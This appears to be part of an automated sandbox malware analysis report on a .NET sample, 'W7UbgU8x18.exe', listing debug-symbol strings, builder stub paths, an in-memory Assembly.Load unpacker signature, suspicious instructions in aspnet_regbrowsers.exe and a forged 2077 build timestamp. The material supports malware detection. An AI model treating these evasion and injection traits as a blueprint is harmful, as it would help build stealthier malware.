                      Source: Binary string: System.Core.ni.pdb% source: WerFault.exe, 0000000A.00000003.285204037.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.285099553.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284989581.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284866428.00000000054DA000.00000004.00000040.sdmp
                      Source: Binary string: dhcpcsvc6.pdbK source: WerFault.exe, 0000000A.00000003.285204037.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.285099553.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284989581.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284866428.00000000054DA000.00000004.00000040.sdmp
                      Source: Binary string: wgdi32.pdb source: WerFault.exe, 0000000A.00000003.285168837.00000000054D0000.00000004.00000040.sdmp
                      Source: Binary string: fltLib.pdb source: WerFault.exe, 0000000A.00000003.285204037.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.285099553.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284989581.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284866428.00000000054DA000.00000004.00000040.sdmp
                      Source: Binary string: shell32.pdb source: WerFault.exe, 0000000A.00000003.285204037.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.285099553.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284989581.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284866428.00000000054DA000.00000004.00000040.sdmp
                      Source: Binary string: System.Core.ni.pdb source: WerFault.exe, 0000000A.00000003.285204037.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.285099553.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284989581.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284866428.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000002.300956712.00000000057B0000.00000004.00000001.sdmp, WER343.tmp.dmp.10.dr
                      Source: Binary string: lC:\Users\user\Desktop\tuneraidfix.pdb source: W7UbgU8x18.exe, 00000000.00000002.301641662.00000000005A8000.00000004.00000001.sdmp, W7UbgU8x18.exe, 00000000.00000000.260367500.00000000005A8000.00000004.00000001.sdmp
                      Source: Binary string: msvcp_win.pdb source: WerFault.exe, 0000000A.00000003.285204037.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.285099553.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284989581.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284866428.00000000054DA000.00000004.00000040.sdmp
                      Source: Binary string: System.Core.ni.pdb0 source: WerFault.exe, 0000000A.00000003.284866428.00000000054DA000.00000004.00000040.sdmp
                      Source: Binary string: rasapi32.pdb source: WerFault.exe, 0000000A.00000003.285204037.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.285099553.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284989581.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284866428.00000000054DA000.00000004.00000040.sdmp
                      Source: Binary string: wimm32.pdb source: WerFault.exe, 0000000A.00000003.285204037.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.285099553.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284989581.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284866428.00000000054DA000.00000004.00000040.sdmp
                      Source: Binary string: tuneraidfix.pdb source: WerFault.exe, 0000000A.00000003.284964542.00000000054D1000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000002.300956712.00000000057B0000.00000004.00000001.sdmp, WerFault.exe, 0000000A.00000003.285031636.0000000005501000.00000004.00000001.sdmp, WER343.tmp.dmp.10.dr
                      Source: Binary string: C:\Users\Administrator\Desktop\Builder\stub\1605780553\un_priv\tuneraidfix\obj\Release\tuneraidfix.pdb:8 source: W7UbgU8x18.exe, 00000000.00000002.302413121.0000000000BAE000.00000004.00000020.sdmp, W7UbgU8x18.exe, 00000000.00000000.255992862.0000000000BAE000.00000004.00000020.sdmp
                      Source: Binary string: wwin32u.pdb source: WerFault.exe, 0000000A.00000003.285204037.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.285099553.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284989581.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284866428.00000000054DA000.00000004.00000040.sdmp
                      Source: Binary string: System.Xml.ni.pdbT source: WerFault.exe, 0000000A.00000002.300956712.00000000057B0000.00000004.00000001.sdmp
                      Source: Binary string: diasymreader.pdb source: WerFault.exe, 0000000A.00000003.285204037.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.285099553.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284989581.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284866428.00000000054DA000.00000004.00000040.sdmp
                      Source: Binary string: psapi.pdb; source: WerFault.exe, 0000000A.00000003.285204037.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.285099553.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284989581.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284866428.00000000054DA000.00000004.00000040.sdmp
                      Source: Binary string: winhttp.pdb source: WerFault.exe, 0000000A.00000003.285204037.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.285099553.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284989581.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284866428.00000000054DA000.00000004.00000040.sdmp
                      Source: Binary string: mscorlib.ni.pdb% source: WerFault.exe, 0000000A.00000003.285204037.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.285099553.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284989581.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284866428.00000000054DA000.00000004.00000040.sdmp
                      Source: Binary string: rtutils.pdb source: WerFault.exe, 0000000A.00000003.285204037.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.285099553.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284989581.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284866428.00000000054DA000.00000004.00000040.sdmp
                      Source: Binary string: System.pdbx source: WerFault.exe, 0000000A.00000002.300956712.00000000057B0000.00000004.00000001.sdmp
                      Source: Binary string: D .pdb source: W7UbgU8x18.exe, 00000000.00000002.301641662.00000000005A8000.00000004.00000001.sdmp, W7UbgU8x18.exe, 00000000.00000000.260367500.00000000005A8000.00000004.00000001.sdmp
                      Source: Binary string: wntdll.pdb( source: WerFault.exe, 0000000A.00000003.271728501.0000000003125000.00000004.00000001.sdmp, WerFault.exe, 0000000A.00000003.270300201.0000000003125000.00000004.00000001.sdmp
                      Source: Binary string: profapi.pdb source: WerFault.exe, 0000000A.00000003.285204037.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.285099553.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284989581.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284866428.00000000054DA000.00000004.00000040.sdmp
                      Source: Binary string: dhcpcsvc6.pdb source: WerFault.exe, 0000000A.00000003.285204037.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.285099553.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284989581.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284866428.00000000054DA000.00000004.00000040.sdmp
                      Source: Binary string: System.Xml.ni.pdb source: WerFault.exe, 0000000A.00000003.285204037.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.285099553.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284989581.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284866428.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284933803.00000000054E7000.00000004.00000001.sdmp, WerFault.exe, 0000000A.00000002.300956712.00000000057B0000.00000004.00000001.sdmp, WER343.tmp.dmp.10.dr
                      Source: Binary string: wgdi32full.pdb source: WerFault.exe, 0000000A.00000003.285168837.00000000054D0000.00000004.00000040.sdmp
                      Source: Binary string: WLDP.pdb source: WerFault.exe, 0000000A.00000003.285204037.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.285099553.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284989581.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284866428.00000000054DA000.00000004.00000040.sdmp
                      Source: Binary string: sechost.pdb source: WerFault.exe, 0000000A.00000003.285031636.0000000005501000.00000004.00000001.sdmp
                      Source: Binary string: System.ni.pdbRSDS source: WER343.tmp.dmp.10.dr
                      Source: Binary string: clrjit.pdb source: WerFault.exe, 0000000A.00000003.285204037.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.285099553.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284989581.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284866428.00000000054DA000.00000004.00000040.sdmp
                      Source: Binary string: System.Xml.pdb0 source: WerFault.exe, 0000000A.00000003.284866428.00000000054DA000.00000004.00000040.sdmp
                      Source: Binary string: rasman.pdb source: WerFault.exe, 0000000A.00000003.285204037.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.285099553.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284989581.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284866428.00000000054DA000.00000004.00000040.sdmp
                      Source: Binary string: Microsoft.VisualBasic.pdb0 source: WerFault.exe, 0000000A.00000003.284866428.00000000054DA000.00000004.00000040.sdmp
                      Source: Binary string: msvcr120_clr0400.i386.pdb source: WerFault.exe, 0000000A.00000003.285204037.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.285099553.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284989581.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284866428.00000000054DA000.00000004.00000040.sdmp
                      Source: Binary string: System.Configuration.ni.pdb source: WerFault.exe, 0000000A.00000003.285204037.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.285099553.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284989581.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284866428.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284933803.00000000054E7000.00000004.00000001.sdmp, WerFault.exe, 0000000A.00000002.300956712.00000000057B0000.00000004.00000001.sdmp, WER343.tmp.dmp.10.dr
                      Source: Binary string: wmswsock.pdb source: WerFault.exe, 0000000A.00000003.285204037.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.285099553.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284989581.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284866428.00000000054DA000.00000004.00000040.sdmp
                      Source: Binary string: version.pdb source: WerFault.exe, 0000000A.00000003.285204037.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.285099553.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284989581.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284866428.00000000054DA000.00000004.00000040.sdmp
                      Source: Binary string: wintrust.pdb source: WerFault.exe, 0000000A.00000003.285204037.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.285099553.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284989581.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284866428.00000000054DA000.00000004.00000040.sdmp
                      Source: Binary string: System.pdbMZ source: WER343.tmp.dmp.10.dr
                      Source: Binary string: System.Xml.pdb source: WerFault.exe, 0000000A.00000003.284866428.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284933803.00000000054E7000.00000004.00000001.sdmp, WerFault.exe, 0000000A.00000002.300956712.00000000057B0000.00000004.00000001.sdmp, WER343.tmp.dmp.10.dr
                      Source: Binary string: System.pdb source: W7UbgU8x18.exe, 00000000.00000000.256471113.00000000028DD000.00000004.00000001.sdmp, WerFault.exe, 0000000A.00000003.284964542.00000000054D1000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000002.300956712.00000000057B0000.00000004.00000001.sdmp, WER343.tmp.dmp.10.dr
                      Source: Binary string: ore.ni.pdb source: WerFault.exe, 0000000A.00000003.284933803.00000000054E7000.00000004.00000001.sdmp
                      Source: Binary string: tuneraidfix.pdb<qA source: WerFault.exe, 0000000A.00000002.300956712.00000000057B0000.00000004.00000001.sdmp
                      Source: Binary string: fixedhost.pdb source: W7UbgU8x18.exe, 00000000.00000000.261864579.0000000002860000.00000004.00020000.sdmp, WerFault.exe, 0000000A.00000002.300956712.00000000057B0000.00000004.00000001.sdmp, WER343.tmp.dmp.10.dr
                      Source: Binary string: System.Core.pdbq source: WerFault.exe, 0000000A.00000003.284933803.00000000054E7000.00000004.00000001.sdmp
                      Source: Binary string: \??\C:\Windows\tuneraidfix.pdb] source: W7UbgU8x18.exe, 00000000.00000002.302413121.0000000000BAE000.00000004.00000020.sdmp, W7UbgU8x18.exe, 00000000.00000000.255992862.0000000000BAE000.00000004.00000020.sdmp
                      Source: Binary string: Kernel.Appcore.pdb source: WerFault.exe, 0000000A.00000003.285168837.00000000054D0000.00000004.00000040.sdmp
                      Source: Binary string: psapi.pdb source: WerFault.exe, 0000000A.00000003.285204037.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.285099553.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284989581.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284866428.00000000054DA000.00000004.00000040.sdmp
                      Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb source: W7UbgU8x18.exe, 00000000.00000002.302413121.0000000000BAE000.00000004.00000020.sdmp, W7UbgU8x18.exe, 00000000.00000000.255992862.0000000000BAE000.00000004.00000020.sdmp
                      Source: Binary string: cryptbase.pdb source: WerFault.exe, 0000000A.00000003.284847253.00000000054D2000.00000004.00000040.sdmp
                      Source: Binary string: System.Core.pdbx source: WerFault.exe, 0000000A.00000002.300956712.00000000057B0000.00000004.00000001.sdmp
                      Source: Binary string: wkernelbase.pdb( source: WerFault.exe, 0000000A.00000003.271474632.0000000003137000.00000004.00000001.sdmp, WerFault.exe, 0000000A.00000003.270327702.0000000003137000.00000004.00000001.sdmp, WerFault.exe, 0000000A.00000003.270696517.0000000003137000.00000004.00000001.sdmp, WerFault.exe, 0000000A.00000003.271114110.0000000003137000.00000004.00000001.sdmp
                      Source: Binary string: bcryptprimitives.pdb source: WerFault.exe, 0000000A.00000003.284847253.00000000054D2000.00000004.00000040.sdmp
                      Source: Binary string: mscoreei.pdb source: WerFault.exe, 0000000A.00000003.284847253.00000000054D2000.00000004.00000040.sdmp
                      Source: Binary string: combase.pdbk source: WerFault.exe, 0000000A.00000003.285188895.00000000054D7000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284978604.00000000054D7000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.285080721.00000000054D7000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284847253.00000000054D2000.00000004.00000040.sdmp
                      Source: Binary string: System.Core.pdb source: WerFault.exe, 0000000A.00000003.284866428.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284933803.00000000054E7000.00000004.00000001.sdmp, WerFault.exe, 0000000A.00000002.300956712.00000000057B0000.00000004.00000001.sdmp, WER343.tmp.dmp.10.dr
                      Source: Binary string: System.Xml.ni.pdb0 source: WerFault.exe, 0000000A.00000003.284866428.00000000054DA000.00000004.00000040.sdmp
                      Source: Binary string: oleaut32.pdb source: WerFault.exe, 0000000A.00000003.285204037.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.285099553.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284989581.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284866428.00000000054DA000.00000004.00000040.sdmp
                      Source: Binary string: Zsymbols\exe\tuneraidfix.pdb source: W7UbgU8x18.exe, 00000000.00000002.301641662.00000000005A8000.00000004.00000001.sdmp, W7UbgU8x18.exe, 00000000.00000000.260367500.00000000005A8000.00000004.00000001.sdmp
                      Source: Binary string: l8C:\Windows\tuneraidfix.pdb source: W7UbgU8x18.exe, 00000000.00000002.301641662.00000000005A8000.00000004.00000001.sdmp, W7UbgU8x18.exe, 00000000.00000000.260367500.00000000005A8000.00000004.00000001.sdmp
                      Source: Binary string: bcryptprimitives.pdbk source: WerFault.exe, 0000000A.00000003.284847253.00000000054D2000.00000004.00000040.sdmp
                      Source: Binary string: wuser32.pdb source: WerFault.exe, 0000000A.00000003.285204037.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.285099553.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284989581.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284866428.00000000054DA000.00000004.00000040.sdmp
                      Source: Binary string: System.Core.pdbi source: WerFault.exe, 0000000A.00000003.284866428.00000000054DA000.00000004.00000040.sdmp
                      Source: Binary string: System.Xml.ni.pdb" source: WerFault.exe, 0000000A.00000003.284933803.00000000054E7000.00000004.00000001.sdmp
                      Source: Binary string: System.ni.pdb source: WerFault.exe, 0000000A.00000003.285204037.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.285099553.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284964542.00000000054D1000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284989581.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284866428.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000002.300956712.00000000057B0000.00000004.00000001.sdmp, WER343.tmp.dmp.10.dr
                      Source: Binary string: cryptbase.pdbk source: WerFault.exe, 0000000A.00000003.284847253.00000000054D2000.00000004.00000040.sdmp
                      Source: Binary string: crypt32.pdb source: WerFault.exe, 0000000A.00000003.285204037.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.285099553.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284989581.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284866428.00000000054DA000.00000004.00000040.sdmp

                      Data Obfuscation:

                      barindex
                      .NET source code contains potential unpackerShow sources
                      Source: W7UbgU8x18.exe, duckclass.cs.Net Code: duckchoiceselector System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                      Source: 0.0.W7UbgU8x18.exe.410000.1.unpack, duckclass.cs.Net Code: duckchoiceselector System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                      Source: 0.0.W7UbgU8x18.exe.410000.0.unpack, duckclass.cs.Net Code: duckchoiceselector System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                      Source: 0.0.W7UbgU8x18.exe.410000.5.unpack, duckclass.cs.Net Code: duckchoiceselector System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                      Source: 0.2.W7UbgU8x18.exe.410000.0.unpack, duckclass.cs.Net Code: duckchoiceselector System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                      Source: C:\Users\user\Desktop\W7UbgU8x18.exeCode function: 0_2_0272B7B2 push ds; retf
                      Source: C:\Users\user\Desktop\W7UbgU8x18.exeCode function: 0_2_0272545A push ds; retf
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeCode function: 2_2_064635A8 push es; iretd
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeCode function: 2_2_06464245 push es; iretd
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeCode function: 2_2_06464241 push es; iretd
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeCode function: 2_2_0646424D push es; iretd
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeCode function: 2_2_06464249 push es; iretd
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeCode function: 2_2_06464255 push es; iretd
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeCode function: 2_2_06464251 push es; iretd
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeCode function: 2_2_0646425D push es; iretd
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeCode function: 2_2_06464259 push es; iretd
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeCode function: 2_2_06464265 push es; iretd
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeCode function: 2_2_06464261 push es; iretd
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeCode function: 2_2_0646426D push es; iretd
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeCode function: 2_2_06464269 push es; iretd
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeCode function: 2_2_06464275 push es; iretd
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeCode function: 2_2_06464271 push es; iretd
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeCode function: 2_2_0646427D push es; iretd
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeCode function: 2_2_06464279 push es; iretd
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeCode function: 2_2_06464205 push es; iretd
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeCode function: 2_2_06464201 push es; iretd
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeCode function: 2_2_0646420D push es; iretd
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeCode function: 2_2_06464209 push es; iretd
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeCode function: 2_2_06464215 push es; iretd
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeCode function: 2_2_06464211 push es; iretd
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeCode function: 2_2_0646421D push es; iretd
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeCode function: 2_2_06464219 push es; iretd
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeCode function: 2_2_06464225 push es; iretd
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeCode function: 2_2_06464221 push es; iretd
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeCode function: 2_2_0646422D push es; iretd
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeCode function: 2_2_06464229 push es; iretd
                      Source: W7UbgU8x18.exeStatic PE information: 0xCB1B3270 [Fri Dec 24 07:40:32 2077 UTC]
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeRegistry key monitored for changes: HKEY_CURRENT_USER_Classes
                      Source: C:\Users\user\Desktop\W7UbgU8x18.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\W7UbgU8x18.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\W7UbgU8x18.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\W7UbgU8x18.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\W7UbgU8x18.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\W7UbgU8x18.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\W7UbgU8x18.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\W7UbgU8x18.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\W7UbgU8x18.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\W7UbgU8x18.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\W7UbgU8x18.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\W7UbgU8x18.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\W7UbgU8x18.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\W7UbgU8x18.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\W7UbgU8x18.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\W7UbgU8x18.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\W7UbgU8x18.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\W7UbgU8x18.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\W7UbgU8x18.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\W7UbgU8x18.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\W7UbgU8x18.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\W7UbgU8x18.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\W7UbgU8x18.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\W7UbgU8x18.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\W7UbgU8x18.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\W7UbgU8x18.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\W7UbgU8x18.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\W7UbgU8x18.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\W7UbgU8x18.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\W7UbgU8x18.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\W7UbgU8x18.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\W7UbgU8x18.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\W7UbgU8x18.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\W7UbgU8x18.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\W7UbgU8x18.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeProcess information set: NOOPENFILEERRORBOX
